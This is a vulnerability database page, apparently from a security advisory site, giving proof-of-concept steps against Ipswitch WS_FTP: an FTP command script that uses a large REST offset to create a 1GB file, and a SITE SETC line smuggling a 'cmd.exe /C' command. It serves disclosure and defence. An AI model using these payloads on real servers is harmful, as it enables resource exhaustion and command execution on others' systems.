• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Ipswitch WS_FTP Multiple Vulnerabilities

The following proof of concept has been provided:
Save this in a file called ftpcmds.txt, after changing the FTP server name,
username, and password.

<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
>>>>>>>>>>>>

Then start it:

C:\>ftp -s:ftpcmds.txt

to see the result. It will create a 1GB file and then delete it.

SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified

The following exploit code has been provided:

• /data/vulnerabilities/exploits/wsftp_allo.cpp
• /data/vulnerabilities/exploits/wsftp_stat.cpp